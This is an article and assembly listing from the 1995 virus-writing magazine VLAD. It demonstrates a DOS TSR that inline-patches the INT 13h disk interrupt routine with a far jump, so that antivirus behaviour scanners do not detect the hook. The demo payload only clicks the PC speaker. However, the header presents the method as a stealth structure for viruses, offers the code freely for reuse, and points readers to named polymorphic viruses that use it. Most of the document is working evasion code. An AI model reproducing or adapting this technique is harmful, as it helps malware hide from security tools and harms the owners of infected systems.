;
;
; INTERRUPT PATCH - Stealth stucture for your TSR by SiRiUS
; =====================================================================
; Germany (c)1995
;
; Interrupt Patch shows you an advanced technique on how to gain control
; of vital system functions like the interrupts.
;
; The most used and known technique is to -hook- an interrupt by changing
; its interrupt vector in the interrupt vector table (IVT).
; This is very easy and needs no further explanation. Since most of the
; advanced behaviour-scanners (AV-TSR-Scanner) will notice such an obvious
; change in the system configuration, they will recognise it as a
; suspicious action, and probably alarm the user. Some of these programs
; will also offer the option to restore the changed vector so that any
; virus which was installed beforehand, will become deactivated.
;
; Interrupt Patch is a prototype of another approach. It will *patch*
; the original interrupt routine and insert a "JMP FAR MySeg:MyOfs" to
; its own code. Of course, no interrupt change will be necessary.
;
; The code below is not a virus, it is a demonstration of the technique
; described above. It makes the speaker click everytime interrupt 13h
; is invoked. You may use this code freely in your own TSRs !
; Compile as usual with TASM or MASM.
;
; If you are interested in seeing a live virus managing this technique
; look at some of the viruses by German author, Neurobasher, such as
; Neuroquila or N8fall. Be careful when experimenting, there is no cure
; program for these polymorphic and multipartite viruses at the moment!
;
; You may contact me in an emergency via my friend at
; an244867@anon.penet.fi
;
; --
;
; Thanks and Hellos to: Tron, rEx, Ferrom, Metal Junkie, Sauron and
; all VX/AV-groups in their fight against primitive and boring self-
; replicating-code... ;)
;
;
;=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/
Frequency EQU 2600
CODE Segment
ASSUME CS:CODE
ASSUME DS:CODE
ASSUME ES:CODE
ASSUME SS:CODE
ORG 100h
Start:
JMP Install
;---- New Stack -------------------------------------------------------------
Stapel DW 0400h DUP (0) ;64 Byte Stack
StackEnd LABEL Word
;---- Data ------------------------------------------------------------------
@AX DW 0000h ;Registers of the interrupted prog
@SS DW 0000h
@SP DW 0000h
@IP_broken DW 0000h ;From the intrpted prog
@CS_broken DW 0000h
@Flg_broken DW 0000h
Far_JMP DB 11101010b ;Opcode: "FAR JMP"
@New_Off DW OFFSET New_13_Start
Patch_CS DW 0000h ;Its our CS
@New_Flg DW 0000h ;This will be PUSHed
Org_INT_13:
Org_13_Off DW 0000h ;Original INT 13h
Org_13_Seg DW 0000h
Org_13_1 DB 00h ;INT 13 routine's first 5 bytes
Org_13_2 DW 0000h
Org_13_3 DW 0000h
New_13_Start:
MOV CS:@AX,AX
POP AX
MOV CS:@IP_broken ,AX
POP AX
MOV CS:@CS_broken ,AX
POP AX
MOV CS:@Flg_broken,AX
MOV CS:@SP,SP
MOV CS:@SS,SS
MOV SP,Offset StackEnd
MOV SS,CS:Patch_CS ;Install new stack
PUSHF
AND AX,0000001100000000b ;Clear FLAGS (not IF and TF)
MOV CS:@Flg_broken,AX
PUSH BX
PUSH CX
PUSH DX
PUSH BP
PUSH SI
PUSH DI
PUSH DS
PUSH ES
CALL Make_Sound ;Make a click :-) !
MOV ES ,CS:Org_13_Seg
MOV BX ,CS:Org_13_Off
MOV AH ,CS:Org_13_1
MOV ES:BX,AH
MOV AX ,CS:Org_13_2
MOV ES:BX+1,AX
MOV AX ,CS:Org_13_3
MOV ES:BX+3,AX ;Restore old INT_13 routine
POP ES
POP DS
POP DI
POP SI
POP BP
POP DX
POP CX
POP BX
MOV AX,CS:@AX
POPF
MOV SS,CS:@SS
MOV SP,CS:@SP
PUSHF
CALL DWORD PTR CS:[Org_INT_13] ;Call old INT 13 routine
; Back from int to here...
MOV SP,Offset StackEnd
MOV SS,CS:Patch_CS ;Build new stack
PUSH ES
PUSH BX
PUSH CX
MOV ES,CS:Org_13_Seg
MOV BX,CS:Org_13_Off
MOV BYTE PTR CH,CS:FAR_JMP
MOV BYTE PTR ES:BX,CH
MOV WORD PTR CX,CS:@New_Off
MOV WORD PTR ES:BX+1,CX
MOV WORD PTR CX,CS:Patch_CS
MOV WORD PTR ES:BX+3,CX ;Re-patch old INT 13 routine
PUSHF
POP CX
OR CS:@Flg_broken,CX
POP CX
POP BX
POP ES
MOV SS,CS:@SS
MOV SP,CS:@SP ;Restore
PUSH CS:@Flg_broken
PUSH CS:@CS_broken
PUSH CS:@IP_broken ;Push old values
IRET ;Go back to the interrupted programm
Make_Sound PROC NEAR
MOV AL ,0B6h
OUT 043h,AL
IN AL ,61h
OR AL ,03h
OUT 061h,AL
MOV AX ,Frequency
OUT 042h,AL
MOV AL ,AH
OUT 042h,AL
MOV CX ,00FFh
Loopy: LOOP Loopy
IN AL,061h
AND AL,0FCh
OUT 061h,AL
RET
Make_Sound ENDP
New_13_End:
;=========================================================================
; This installs us in memory
;=========================================================================
Install:
CLI
PUSH CS
POP AX
MOV Patch_CS,AX ;Our SEGMENT
MOV AX,3513h
INT 21h ;Get INT 13h into ES:BX
MOV Org_13_Seg,ES
MOV Org_13_Off,BX ;Save INT-13h
MOV AH,ES:BX
MOV Org_13_1,AH
MOV AX,ES:BX+1
MOV Org_13_2,AX
MOV AX,ES:BX+3 ;Save first 5 Bytes of the INT -
MOV Org_13_3,AX ;Routine
MOV BYTE PTR CH,FAR_JMP
MOV BYTE PTR ES:BX,CH
MOV WORD PTR CX,@New_Off
MOV WORD PTR ES:BX+1,CX
MOV WORD PTR CX,Patch_CS
MOV WORD PTR ES:BX+3,CX ;Patch the INT 13 Routine
MOV AH,09h
MOV DX,Offset Message
INT 21h ;Show install-message
MOV AX, OFFSET New_13_End
MOV CL, 4
ADD AX, 0Fh
SHR AX, CL
MOV DX, AX
STI
MOV AX, 3100h
INT 21h ;Install as a TSR in memory
Message DB 10d,13d
DB '· INTERRUPT PATCH by SiRiUS/Germany for VLAD Magazine',10d,13d
DB '--------------------------------------------------95-',10d,13d
DB ' Presentation of the -slicing- interrupt technique. ',10d,13d
DB 13d,10d
DB 13d,10d
DB 13d,10d,'$'
Code ENDS
END Start
- VLAD #5 INDEX -